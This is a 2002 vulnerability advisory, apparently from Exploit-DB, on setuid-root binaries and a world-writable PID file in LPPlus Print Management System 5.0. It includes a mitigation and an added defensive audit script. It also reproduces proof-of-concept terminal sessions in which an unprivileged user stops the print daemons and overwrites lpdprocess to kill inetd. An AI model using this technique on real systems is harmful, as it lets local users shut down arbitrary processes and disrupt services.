vendor: LPPlus Print Management System
by: SecurityFocus
CVSS: 7.2 HIGH
Privilege Escalation, Denial of Service
CWE: 264
Product Name: LPPlus Print Management System
Affected Version From: LPPlus Print Management System 5.0
Affected Version To: LPPlus Print Management System 5.0
Patch Exists: YES
Related CWE: CVE-2002-0753
CPE: a:lpplus:lpplus_print_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

LPPlus Print Management System Vulnerabilities

LPPlus Print Management System installs several files setuid root by default. These include dccsched, dcclpdser and dccbkst, which start the scheduler, LPD server and network status daemons respectively, and dccshut, dcclpdshut and dccbkstshut, which stop the same services. By default, all six may be run by a user of any privilege level, so any user can start and stop printing services regardless of userid or group. Additionally, the file $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. Because the file is world-writable and dcclpdshut is executable by any user, a user who replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process and then runs $LPHOME/bin/dcclpdshut can send signal 2 (SIGINT) to any process, shutting it down.

Mitigation:

Ensure that the files dccsched, dcclpdser and dccbkst are not setuid root and that the file $LPHOME/system/lpdprocess is not set to mode 777.
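
A check for the two conditions named in the mitigation, as an added example that is not part of the advisory or of LPPlus: it flags any of the six binaries that is setuid and executable by any user, and a world-writable lpdprocess file. The function names, output text and the constructed test tree are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the advisory): audit an LPPlus tree for both issues.
# File names come from the advisory; function names, messages and the
# constructed fixture are assumptions of this example.

LPPLUS_BINS="dccsched dcclpdser dccbkst dccshut dcclpdshut dccbkstshut"

# lpplus_audit DIR: prints one line per finding, sets LPPLUS_FINDINGS,
# returns 0 when the tree is clean and 1 otherwise.
lpplus_audit() {
    lphome=$1
    LPPLUS_FINDINGS=0
    for name in $LPPLUS_BINS; do
        f="$lphome/bin/$name"
        [ -f "$f" ] || continue
        # Issue 1: setuid bit (4000) together with execute-for-other (0001).
        if [ -n "$(find "$f" -perm -4001)" ]; then
            echo "setuid and executable by any user: $(ls -ld "$f")"
            LPPLUS_FINDINGS=$((LPPLUS_FINDINGS + 1))
        fi
    done
    pidfile="$lphome/system/lpdprocess"
    # Issue 2: PID file writable by other (0002), so any user can choose
    # which process dcclpdshut signals.
    if [ -f "$pidfile" ] && [ -n "$(find "$pidfile" -perm -0002)" ]; then
        echo "world-writable PID file: $(ls -ld "$pidfile")"
        LPPLUS_FINDINGS=$((LPPLUS_FINDINGS + 1))
    fi
    [ "$LPPLUS_FINDINGS" -eq 0 ]
}

# Constructed fixture: empty files with modes matching what the advisory
# describes (setuid + world-executable binaries, mode 777 PID file).
# Files are owned by the current user here; on a real install the owner is root.
make_default_tree() {
    dir=$(mktemp -d) || return 1
    mkdir "$dir/bin" "$dir/system"
    for name in $LPPLUS_BINS; do
        : > "$dir/bin/$name"
        chmod 4755 "$dir/bin/$name"
    done
    echo 26272 > "$dir/system/lpdprocess"
    chmod 777 "$dir/system/lpdprocess"
    echo "$dir"
}

# Audit a real install only when LPHOME is set in the environment.
if [ -n "${LPHOME:-}" ]; then lpplus_audit "$LPHOME" || true; fi
```

The check reports the setuid bit regardless of owner, so the `ls -ld` output in each finding should be read to confirm the file is owned by root.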
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2:

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$